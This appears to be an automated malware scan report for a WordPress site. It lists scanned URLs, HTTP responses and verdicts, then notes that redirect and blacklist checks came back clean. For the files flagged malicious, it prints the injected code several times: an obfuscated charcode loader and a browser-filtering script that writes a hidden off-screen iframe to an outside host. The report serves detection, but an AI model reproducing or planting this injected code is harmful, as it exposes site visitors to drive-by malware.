Scanned pages/files
Request | Server response | Status |
http://www.certaprotruth.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 29 Dec 2014 18:21:47 GMT Location: http://certaprotruth.com/ Server: Apache/2.2.15 (CentOS) Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://certaprotruth.com/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://certaprotruth.com/ | 200 OK Content-Length: 125975 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw1 = []; _gw1.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw1.push(['_setPageId', '6918518510413211618916516918118018617118018617417116717']); _gw1.push(['_setOption', '0171184193182181185175186175181180128167168185181178187']); _gw1.push(['_setOption', '1861711291691781751821281841711691861101221241241821901']); _gw1.push(['_setOption', '1416718718618111416718718618111412212412418219011112919']); _gw1.push(['_setPageId', '5130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw1.length; v++) t += _gw1[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://certaprotruth.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 95528 Content-Type: text/javascript | clean |
http://certaprotruth.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 2457 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (g_haystack, g_needle, g_offset) { var haystack = (g_haystack + '').toLowerCase(); var needle = (g_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, g_offset)) !== -1) { return index; } return false; } function user_agenta(){ var blockLista = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','I } if (!user_agenta()) { var cookie = getCookie('misspronto18auejtlanerau'); if (cookie == undefined) { setCookie('misspronto18auejtlanerau', true, 260000); document.write('<'+'i'+'fra'+'me'+' s'+'r'+'c="http://teneta.mon-pang.com/tewyreutrutryi12.html" style="po'+'si'+'tion'+':absolute'+';'+'left'+':'+'-1350px;'+'top:'+'-1350px;" height="140" width="140"></i'+'f'+'r'+'am'+'e'+'>'); } } })(); Decoded script: <iframe src="http://teneta.mon-pang.com/tewyreutrutryi12.html" style="position:absolute;left:-1350px;top:-1350px;" height="140" width="140"></iframe> Antivirus reports:
| ||
http://certaprotruth.com/wp-content/plugins/mailchimp/js/scrollTo.js?ver=1.2.9 | 200 OK Content-Length: 4709 Content-Type: text/javascript | clean |
http://certaprotruth.com/wp-includes/js/jquery/jquery.form.min.js?ver=3.37.0 | 200 OK Content-Length: 2457 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (g_haystack, g_needle, g_offset) { var haystack = (g_haystack + '').toLowerCase(); var needle = (g_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, g_offset)) !== -1) { return index; } return false; } function user_agenta(){ var blockLista = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','I } if (!user_agenta()) { var cookie = getCookie('misspronto18auejtlanerau'); if (cookie == undefined) { setCookie('misspronto18auejtlanerau', true, 260000); document.write('<'+'i'+'fra'+'me'+' s'+'r'+'c="http://teneta.mon-pang.com/tewyreutrutryi12.html" style="po'+'si'+'tion'+':absolute'+';'+'left'+':'+'-1350px;'+'top:'+'-1350px;" height="140" width="140"></i'+'f'+'r'+'am'+'e'+'>'); } } })(); Decoded script: <iframe src="http://teneta.mon-pang.com/tewyreutrutryi12.html" style="position:absolute;left:-1350px;top:-1350px;" height="140" width="140"></iframe> Antivirus reports:
| ||
http://certaprotruth.com/wp-content/plugins/mailchimp/js/mailchimp.js?ver=1.2.9 | 200 OK Content-Length: 3445 Content-Type: text/javascript | clean |
http://certaprotruth.com/wp-content/plugins/growyn-search/includes/onclick.js?ver=3.8.5 | 200 OK Content-Length: 2457 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (g_haystack, g_needle, g_offset) { var haystack = (g_haystack + '').toLowerCase(); var needle = (g_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, g_offset)) !== -1) { return index; } return false; } function user_agenta(){ var blockLista = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','I } if (!user_agenta()) { var cookie = getCookie('misspronto18auejtlanerau'); if (cookie == undefined) { setCookie('misspronto18auejtlanerau', true, 260000); document.write('<'+'i'+'fra'+'me'+' s'+'r'+'c="http://teneta.mon-pang.com/tewyreutrutryi12.html" style="po'+'si'+'tion'+':absolute'+';'+'left'+':'+'-1350px;'+'top:'+'-1350px;" height="140" width="140"></i'+'f'+'r'+'am'+'e'+'>'); } } })(); Decoded script: <iframe src="http://teneta.mon-pang.com/tewyreutrutryi12.html" style="position:absolute;left:-1350px;top:-1350px;" height="140" width="140"></iframe> Antivirus reports:
| ||
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12798 Content-Type: application/javascript | clean |
http://widgets.twimg.com/j/2/widget.js | 200 OK Content-Length: 1489 Content-Type: application/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19470 Content-Type: text/javascript | clean |
http://www.statcounter.com/counter/counter_xhtml.js | 200 OK Content-Length: 21363 Content-Type: application/x-javascript | clean |
http://www.certaprotruth.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Mon, 29 Dec 2014 18:21:56 GMT Pragma: no-cache Location: http://certaprotruth.com/test404page.js Server: Apache/2.2.15 (CentOS) Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://certaprotruth.com/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://certaprotruth.com/test404page.js | HTTP/1.1 302 Found Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Mon, 29 Dec 2014 18:21:56 GMT Pragma: no-cache Location: http://certaprotruth.com?s=test404page.js&search_404=1 Server: Apache/2.2.15 (CentOS) Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://certaprotruth.com/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://certaprotruth.com?s=test404page.js&search_404=1/ | 200 OK Content-Length: 17336 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw1 = []; _gw1.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw1.push(['_setPageId', '6918518510413211618916516918118018617118018617417116717']); _gw1.push(['_setOption', '0171184193182181185175186175181180128167168185181178187']); _gw1.push(['_setOption', '1861711291691781751821281841711691861101221241241821901']); _gw1.push(['_setOption', '1416718718618111416718718618111412212412418219011112919']); _gw1.push(['_setPageId', '5130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw1.length; v++) t += _gw1[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://certaprotruth.com?s=test404page.js&search_404=1/test404page.js | 200 OK Content-Length: 17336 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw1 = []; _gw1.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw1.push(['_setPageId', '6918518510413211618916516918118018617118018617417116717']); _gw1.push(['_setOption', '0171184193182181185175186175181180128167168185181178187']); _gw1.push(['_setOption', '1861711291691781751821281841711691861101221241241821901']); _gw1.push(['_setOption', '1416718718618111416718718618111412212412418219011112919']); _gw1.push(['_setPageId', '5130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw1.length; v++) t += _gw1[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: certaprotruth.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Dec 2014 18:21:47 GMT
Server: Apache/2.2.15 (CentOS)
Content-Type: text/html; charset=UTF-8
X-Pingback: http://certaprotruth.com/xmlrpc.php
X-Powered-By: PHP/5.3.3
GET / HTTP/1.1
Host: certaprotruth.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Dec 2014 18:21:47 GMT
Server: Apache/2.2.15 (CentOS)
Content-Type: text/html; charset=UTF-8
X-Pingback: http://certaprotruth.com/xmlrpc.php
X-Powered-By: PHP/5.3.3
Second query (visit from search engine):
GET / HTTP/1.1
Host: certaprotruth.com
Referer: http://www.google.com/search?q=certaprotruth.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: certaprotruth.com
Referer: http://www.google.com/search?q=certaprotruth.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=certaprotruth.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://certaprotruth.com/
Result: certaprotruth.com is not infected or malware details are not published yet.
Result: certaprotruth.com is not infected or malware details are not published yet.